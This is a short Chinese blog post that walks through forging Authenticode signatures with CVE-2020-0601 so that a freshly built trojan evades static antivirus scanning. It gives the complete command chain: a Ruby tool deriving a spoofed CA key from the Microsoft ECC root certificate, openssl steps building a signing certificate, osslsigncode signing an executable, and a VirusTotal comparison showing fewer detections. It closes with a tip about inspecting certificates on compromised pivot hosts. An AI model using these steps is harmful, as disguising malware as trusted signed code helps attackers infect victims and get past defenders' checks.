利用CVE-2020-0601进行签名伪造

当我们的木马生成好了,可以在稍微用一下签名在静态上过一过杀软,常用的就是spy.py

 

 当然,我们也可以用一下CVE-2020-0601进行伪造签名

 

 运行我们的工具,ruby main.rb MicrosoftECCProductRootCertificateAuthority.cer,此时生成“spoofed_ca.key”文件

 

 然后我们在生成新的证书,openssl req -new -x509 -key spoofed_ca.key -out sign.crt

 

 然后生成一个新密钥,openssl ecparam -name secp384r1 -genkey -noout -out sign.key

然后生成一个新的证书签名请求(CSR),openssl req -new -key sign.key -out sign.csr -config openssl_cs.conf -reqexts v3_cs

最后使用我们的欺骗性CA和CA密钥签署新的CSR,openssl x509 -req -in sign.csr -CA sign.crt -CAkey spoofed_ca.key -CAcreateserial -out sign.crt -days 1000 -extfile openssl_cs.conf -extensions v3_cs

 

 将证书打包到一个PKCS12文件中,openssl pkcs12 -export -in sign.crt -inkey sign.key -certfile sign.crt -name "sign" -out cert.p12

 

 osslsigncode sign -pkcs12 cert.p12 -n "signed" -pass 123456 -in /root/Desktop/calc.exe -out /root/Desktop/calc2.exe,利用签名生成我们的文件

然后在将原始的和签了名的exe放在vt上简单对比一下,少了一点

 

 一个tips,当拿下一些跳板机的时候,我们可以看看机器的证书,certlm.msc,因为用的是工具默认的证书,可能效果不是很理想,我们亦或者可以在用spy在签一下名,当然,这些都是笔者的臆测,记录一下

posted @ 2022-02-11 22:53  z珠穆朗玛鑫  阅读(169)  评论(0编辑  收藏  举报